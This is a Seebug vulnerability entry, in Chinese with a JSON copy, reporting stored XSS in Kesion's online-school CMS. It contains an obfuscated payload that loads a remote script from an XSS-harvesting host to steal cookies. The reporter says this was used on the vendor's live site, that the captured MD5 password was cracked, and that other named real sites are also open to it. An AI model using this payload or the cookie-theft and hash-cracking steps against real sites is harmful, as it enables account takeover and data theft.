ID SSV:94909
Type seebug
Reporter Root
Modified 2015-05-08T00:00:00
Description
简要描述:
大CMS厂商。。
http://www.kesion.com/
已有 469,628 个网站选择KESION产品搭建,今日新增网站 104 个
拿了好多证书。
详细说明:
首先在他们网站
http://e.kesion.com/model/view.aspx?m_id=3&id=4373
我目测只要有回复框就百分百存在这漏洞
而且全站判断的方式一样
为什么这样说呢
往下面看就知道了
http://e.kesion.com/model/view.aspx?m_id=3&id=4373
2014年司法考试历年真题课件-民法
OK
我们当然像二哥说的,不要见框就插,我们先试下,别那么着急插入js
<img src="1" onerror=alert("1")>
提交看下
<img src="https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png" alt="1.png" width="600" onerror="javascript:errimg(this);">
那么知道了。。那么我们用Xss测试字符串转换工具转换下
然后把js转换,
插进去
<img/src=http://www.baidu.com/img/baidu_sylogo1.gif onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,104,97,99,107,116,97,115,107,46,110,101,116,47,75,48,84,79,97,115,63,49,52,51,48,53,55,57,52,52,50);document.body.appendChild(window.s)})()>
然后获取到了cookie
<img src="https://images.seebug.org/upload/201505/0223322524ccf9f6b72896664bcf3a6574ca7a72.png" alt="2.png" width="600" onerror="javascript:errimg(this);">
平台看下
<img src="https://images.seebug.org/upload/201505/0223333579e98652a3c2548fe38ef93436fd4cbe.png" alt="3.png" width="600" onerror="javascript:errimg(this);">
这么弱智的加密。。自己还是个知名的cms,客户那么多,无语了。。
安全要注重丫,亲
拿到密码来:http://pmd5.com
解密
得到密码
<img src="https://images.seebug.org/upload/201505/022336194f730c7ef38b4ee30d843650946e43ff.png" alt="4.png" width="600" onerror="javascript:errimg(this);">
接下来他给出了几个比较大的案例,当然这是大的,我估计小的也是很多的。。他们签了好多合同了,我没必要多说啦。。
看他们的漏洞案例哈。
漏洞证明:
筑诚造价网校
弘智网校
http://www.hzwx.com/a/1141.aspx
其实案例全部加上 /ask
就进入问答社区了
然后你们懂得
{"type": "seebug", "lastseen": "2017-11-19T12:34:39", "href": "https://www.seebug.org/vuldb/ssvid-94909", "cvss": {"score": 0.0, "vector": "NONE"}, "modified": "2015-05-08T00:00:00", "reporter": "Root", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\r\n\r\n\u5927CMS\u5382\u5546\u3002\u3002\r\nhttp://www.kesion.com/\r\n\u5df2\u6709 469,628 \u4e2a\u7f51\u7ad9\u9009\u62e9KESION\u4ea7\u54c1\u642d\u5efa\uff0c\u4eca\u65e5\u65b0\u589e\u7f51\u7ad9 104 \u4e2a\r\n\u62ff\u4e86\u597d\u591a\u8bc1\u4e66\u3002\r\n\r\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\r\n\r\n\u9996\u5148\u5728\u4ed6\u4eec\u7f51\u7ad9\r\nhttp://e.kesion.com/model/view.aspx?m_id=3&id=4373\r\n\u6211\u76ee\u6d4b\u53ea\u8981\u6709\u56de\u590d\u6846\u5c31\u767e\u5206\u767e\u5b58\u5728\u8fd9\u6f0f\u6d1e\r\n\u800c\u4e14\u5168\u7ad9\u5224\u65ad\u7684\u65b9\u5f0f\u4e00\u6837\r\n\u4e3a\u4ec0\u4e48\u8fd9\u6837\u8bf4\u5462\r\n\u5f80\u4e0b\u9762\u770b\u5c31\u77e5\u9053\u4e86\r\nhttp://e.kesion.com/model/view.aspx?m_id=3&id=4373\r\n2014\u5e74\u53f8\u6cd5\u8003\u8bd5\u5386\u5e74\u771f\u9898\u8bfe\u4ef6-\u6c11\u6cd5\r\nOK\r\n\u6211\u4eec\u5f53\u7136\u50cf\u4e8c\u54e5\u8bf4\u7684\uff0c\u4e0d\u8981\u89c1\u6846\u5c31\u63d2\uff0c\u6211\u4eec\u5148\u8bd5\u4e0b\uff0c\u522b\u90a3\u4e48\u7740\u6025\u63d2\u5165js\r\n`<img src=\"1\" onerror=alert(\"1\")>`\r\n\u63d0\u4ea4\u770b\u4e0b\r\n\r\n\r\n[<img src=\"https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png\" alt=\"1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png)\r\n\r\n\r\n\u90a3\u4e48\u77e5\u9053\u4e86\u3002\u3002\u90a3\u4e48\u6211\u4eec\u7528Xss\u6d4b\u8bd5\u5b57\u7b26\u4e32\u8f6c\u6362\u5de5\u5177\u8f6c\u6362\u4e0b\r\n\u7136\u540e\u628ajs\u8f6c\u6362\uff0c\r\n\u63d2\u8fdb\u53bb\r\n\r\n\r\n```\r\n<img/src=http://www.baidu.com/img/baidu_sylogo1.gif onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,104,97,99,107,116,97,115,107,46,110,101,116,47,75,48,84,79,97,115,63,49,52,51,48,53,55,57,52,52,50);document.body.appendChild(window.s)})()>\r\n```\r\n\r\n\r\n\u7136\u540e\u83b7\u53d6\u5230\u4e86cookie\r\n\r\n\r\n[<img src=\"https://images.seebug.org/upload/201505/0223322524ccf9f6b72896664bcf3a6574ca7a72.png\" alt=\"2.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201505/0223322524ccf9f6b72896664bcf3a6574ca7a72.png)\r\n\r\n\r\n\u5e73\u53f0\u770b\u4e0b\r\n\r\n\r\n[<img src=\"https://images.seebug.org/upload/201505/0223333579e98652a3c2548fe38ef93436fd4cbe.png\" alt=\"3.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201505/0223333579e98652a3c2548fe38ef93436fd4cbe.png)\r\n\r\n\r\n\u8fd9\u4e48\u5f31\u667a\u7684\u52a0\u5bc6\u3002\u3002\u81ea\u5df1\u8fd8\u662f\u4e2a\u77e5\u540d\u7684cms\uff0c\u5ba2\u6237\u90a3\u4e48\u591a\uff0c\u65e0\u8bed\u4e86\u3002\u3002\r\n\u5b89\u5168\u8981\u6ce8\u91cd\u4e2b\uff0c\u4eb2\r\n\u62ff\u5230\u5bc6\u7801\u6765\uff1ahttp://pmd5.com\r\n\u89e3\u5bc6\r\n\u5f97\u5230\u5bc6\u7801\r\n\r\n\r\n[<img src=\"https://images.seebug.org/upload/201505/022336194f730c7ef38b4ee30d843650946e43ff.png\" alt=\"4.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201505/022336194f730c7ef38b4ee30d843650946e43ff.png)\r\n\r\n\r\n\u63a5\u4e0b\u6765\u4ed6\u7ed9\u51fa\u4e86\u51e0\u4e2a\u6bd4\u8f83\u5927\u7684\u6848\u4f8b\uff0c\u5f53\u7136\u8fd9\u662f\u5927\u7684\uff0c\u6211\u4f30\u8ba1\u5c0f\u7684\u4e5f\u662f\u5f88\u591a\u7684\u3002\u3002\u4ed6\u4eec\u7b7e\u4e86\u597d\u591a\u5408\u540c\u4e86\uff0c\u6211\u6ca1\u5fc5\u8981\u591a\u8bf4\u5566\u3002\u3002\r\n\u770b\u4ed6\u4eec\u7684\u6f0f\u6d1e\u6848\u4f8b\u54c8\u3002\r\n \r\n\r\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\r\n\r\n\r\n\r\n\r\n\u7b51\u8bda\u9020\u4ef7\u7f51\u6821\r\n\r\n\r\n\r\n\r\n[](https://images.seebug.org/upload/201505/0223374812400768b9e9ada7df183bdfe60b39e4.png)\r\n\r\n\r\n\r\n\r\n```\r\n\u5f18\u667a\u7f51\u6821\r\n```\r\n\r\n\r\nhttp://www.hzwx.com/a/1141.aspx\r\n\r\n\r\n[](https://images.seebug.org/upload/201505/022343372e6b90b208405a7b81523a0e18b74080.png)\r\n\r\n\r\n\u5176\u5b9e\u6848\u4f8b\u5168\u90e8\u52a0\u4e0a /ask\r\n\u5c31\u8fdb\u5165\u95ee\u7b54\u793e\u533a\u4e86\r\n\u7136\u540e\u4f60\u4eec\u61c2\u5f97", "bulletinFamily": "exploit", "references": [], "viewCount": 144, "status": "details", "sourceHref": "", "cvelist": [], "enchantments_done": [], "title": "\u79d1\u8baf\u7f51\u6821\u7cfb\u7edfxss\u6f0f\u6d1e(\u5bc6\u7801\u4e3aMD5\u52a0\u5bc6)", "id": "SSV:94909", "sourceData": "", "published": "2015-05-08T00:00:00", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645478708}}
{}
